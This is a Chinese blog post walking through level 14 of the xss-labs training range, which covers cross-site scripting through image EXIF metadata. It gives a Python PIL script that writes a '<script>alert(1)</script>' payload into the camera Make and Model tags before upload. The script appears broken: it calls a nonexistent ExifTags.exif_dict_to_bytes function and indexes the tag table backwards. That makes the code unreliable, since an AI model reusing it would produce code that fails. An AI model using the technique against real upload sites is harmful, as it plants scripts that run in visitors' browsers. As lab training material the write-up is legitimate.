[网络安全]xss-labs level-14 解题详析

读者可参考、订阅专栏:Xss-Labs靶场攻防实战


姿势

逻辑后端代码:

在这里插入图片描述
该题涉及exif xss漏洞


exif xss漏洞

Exif XSS 漏洞是一种安全漏洞,存在于图片的 Exif(Exchangeable Image File Format)数据中。
Exif 数据是嵌入在数字图像文件中的元数据,包含有关图像的信息,如拍摄日期、相机型号、GPS 坐标等。浏览器和其他应用程序通常会解析和显示这些数据。

在这里插入图片描述

当存在 Exif XSS 漏洞时,攻击者可以在图像的 Exif 数据中插入恶意的 JavaScript 代码。当用户加载带有恶意 Exif 数据的图像时,浏览器或其他应用程序可能会错误地解析恶意代码,并在受害者的浏览器上执行它。

脚本如下:

import PIL.ExifTags as ExifTags
from PIL import Image

# 打开图像文件
image = Image.open('初始.jpg')

# 获取图像的 Exif 数据
exif_data = image._getexif()

# 将 Exif 数据转为可修改的字典格式
exif_dict = dict(exif_data)

# 修改 Exif 数据
exif_dict[ExifTags.TAGS['Make']] = 'xss语句'
exif_dict[ExifTags.TAGS['Model']] = 'xss语句'

# 将修改后的 Exif 数据重新写回图像
exif_bytes = ExifTags.exif_dict_to_bytes(exif_dict)
image.save('改后.jpg', exif=exif_bytes)

先修改iframe标签:

在这里插入图片描述

接着使用脚本修改图像数据,xss语句为:

<script>alert(1)</script>

再上传图片:

在这里插入图片描述

回显如下:

在这里插入图片描述


总结

以上为[网络安全]xss-labs level-14 解题详析,后续将分享[网络安全]xss-labs level-15 解题详析。

我是秋说,我们下次见。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值